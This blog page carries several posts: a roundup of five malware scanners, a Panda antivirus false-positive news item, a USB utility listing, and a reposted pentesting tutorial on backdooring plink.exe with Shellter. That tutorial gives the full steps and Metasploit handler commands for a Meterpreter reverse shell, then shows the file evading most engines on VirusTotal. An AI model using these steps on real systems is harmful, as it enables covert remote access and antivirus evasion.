5 Malware Scanners You Should Know About

For many years computers have been infected by malicious software, also known as “Malware”. It is specially designed to gain access or damage computer without the knowledge of owner. To protect user from any damage various anti-malware software have been developed.

Today we are going to discuss few best known anti-malware software that can be used to protect ourselves.

MalwareBytes’ Anti-Malware

MalwareBytes is Windows based anti-malware software. It scans the Windows for malicious software. Free version is available online with limited features and supports scheduled scan with paid version. The author of MalwareBytes claims to detect those malware that left undetectable by other anti malware scanners.

ClamAV

ClamAV is the most powerful open source malware scanner that provides integration with mail server and scans attached file for malware. It provides a flexible and scalable multi-threaded daemon, a command line scanner, and feature to update via Internet. Clam Anti Virus is based on a shared library and provides up to date virus database that you can use with your own software.

VirusTotal

VirusTotal is a web based anti malware scanner that analyzes submitted files for known viruses and malware. It is associated with many antivirus engines from different vendors and updates regularly with new signatures. It also alerts the antivirus vendors if the submitted file is not detected by their product.

SUPERAntiSpyware

SuperAntiSpyware is the best portable malware scanner that allows direct run from any USB drive without the need of installation that can be an issue on highly infected computer. The latest version is easily downloadable from the internet which saves trouble and time to update the software. The free version of SuperAntiSpyware does not include real time protection and update features.

EMCO Malware Destroyer

It is a malware scanning management tool to batch scans multiple computers for malware on a network without real time protection. EMCO’s free version provides only 1 scanning mode and allows scanning of single local and remote computer. It is quite fast because it checks infection based on the targeted definitions.

Many Cyber security professionals and individuals use these tools to scan for malicious software. Yet, there are many other scanners as well. 

Read more

by Malik korrich ~ dimanche 26 juin 2016 1 commentaires

Bypass an Anti-Virus with Shellter on Kali Linux

Having trouble getting a Meterpreter shell past that pesky AV? Check out the new Shellter 4.0 shell obfuscation program!

The latest version of Shellter for pentesters was revealed at B-Sides Lisbon earlier this month. Updates include increased obfuscation through a custom encoder and polymorphic decoder. Also this version saves a few steps by including the most common Meterpreter shells.

Shellter works by taking a legit Windows .exe file, adds the shell code to it and then does a great job of modifying the file for AV bypass. The program’s automatic mode makes the whole process very pain free. In this tutorial I used the latest version of Kali Linux and a Windows 7 Virtual Machine.

So enough talk, let’s see it in action!

1. Download and install “shellter” (https://www.shellterproject.com/download/ )

**Note: the Kali repos apparently don’t contain the newest 4.0 version yet. To get the latest, instead of using ‘apt-get install shellter’, just download and extract the ZIP file to the “/etc/share” folder.

2. Grab “plink.exe” from Kali’s ‘usr/share/windows-binaries’ directory and copy it into the Shellter directory.

3. Start Shellter – ‘shellter’ from the terminal or use ‘wineconsole shelter’ from ‘/etc/share/shellter’ if you manually installed.

4. Choose ‘A’ for Automatic Mode

5. At the PE Target Prompt, enter “plink.exe”

6. When prompted for Payloads select “L” and then “1”

7. Next, enter the IP address of your Kali system (mine is 192.168.1.39)

8. And the port to use (I used 5555)

Shellter will obfuscate the code and crunch for a while. Then you should see:

Success!

9. Now we need to start a listener service on the Kali system using the same settings from above:

• start Metasploit (‘msfconsole’ in a terminal)
• use exploit/multi/handler
• set payload windows/meterpreter/reverse_tcp
• set lhost 192.168.1.39
• set lport 5555
• exploit

10. Now that Kali is waiting for a connection. Copy our evil plink.exe command to the Windows 7 system and run it:

And we have a shell!

Compare the size of the backdoored exe to the original one. They are the exact same size! Now upload the backdoored exe to Virustotal and scan it for malicious content:

One (!) anti-virus engine detected it as malicious. And it was not a mainstream AV normally found in companies…

Conclusion

As you can see, a backdoored file that will bypass AV can be created pretty easily. AV is great but it can’t stop everything, you need to train your company users to be vigilant when using internet sites, social media and e-mail. Avoid suspicious websites, don’t allow website popups or warnings to install anything and never open unsolicited or suspicious attachments in e-mails. If you don’t know if you should click on something, ask your IT department. A little user vigilance can go a long way at protecting your network!

The Author:

This wonderful tutorial has been written and first published by Cyberarms.

Read more

by Malik korrich ~ samedi 18 juillet 2015 0 commentaires

Panda antivirus turned itself into a malware and obstructed PCs

Panda users faced a difficult situation when the Spanish security software firm reported an update that classified components of its own technology as malicious.An upgrade to a number of Panda antivirus programs on Wednesday mistakenly indicated key files as malware, putting them in detention. In this execution, the antivirus system stopped working.

Consequently the enterprise PCs running the antivirus software became tangled leaving some systems either insecure or unable to access the internet. A Panda spokesman affirmed the problem while advising that the issue was well in hand.


"A bad update was published temporarily today [Wednesday] that resulted in some system files being detected by the Panda engine, a replacement update was promptly published removing the error and restoring the wrongly quarantined files," a Panda representative told El Reg.  

He further added, "At present we recommend NOT rebooting systems. This will allow us to update the system with the amended update. This update will also restore files previously detected."

Panda's free antivirus, retail 2015 service, and its enterprise cloud-based antimalware service are all affected. However it is not understandable how many machines have been disconcerted.

The company has warned the users on Twitter, "Please, Don't reboot PCs. We'll keep you posted."
In an advisory, Panda said the erroneous signature file was "repaired immediately," but warned under certain conditions it is possible for the "incident to persist."

It has not happened for the first time that an antimalware service has erroneously stratified key files as malware. In 2010, McAfee accidentally deleted a essential Windows XP file and blocked millions of machines. False positives involving antivirus updates have distressed all vendors from time to time
Recently Google-owned VirusTotal incorporated with several companies, including Microsoft, to minimize the number of false-flags in its antivirus products.

The resulting problems are extremely worst when Windows operating system files are falsely classified as potentially malicious and quarantined, ensuing unusable Windows systems. Panda's auto-immune screw-up would have caused corresponding problems.

Read more

by Malik korrich ~ jeudi 12 mars 2015 0 commentaires

[SHARE] UiTM USB Manager

UiTM USB Manager
A simple program that allows you to unhide all files in your drives. Delete shortcuts and hide unnecessary files. You can also format and rename your drive with it. Comes with Safe Mode. Keep you safe from accidentally format you current drives, such as C:\ or D:\ with contains your files and OS.

Features
-Safe Mode
-Unhide hidden files
-Delete shortcut viruses
-Hide unnecessary files
-Quick Format
-Rename
-Detect if drive is connected/removed
-Launch at startup

Screenshots
 
 

Video

Downloads

UiTM USB Manager(222KB)

Read more

by Malik korrich ~ dimanche 21 décembre 2014 0 commentaires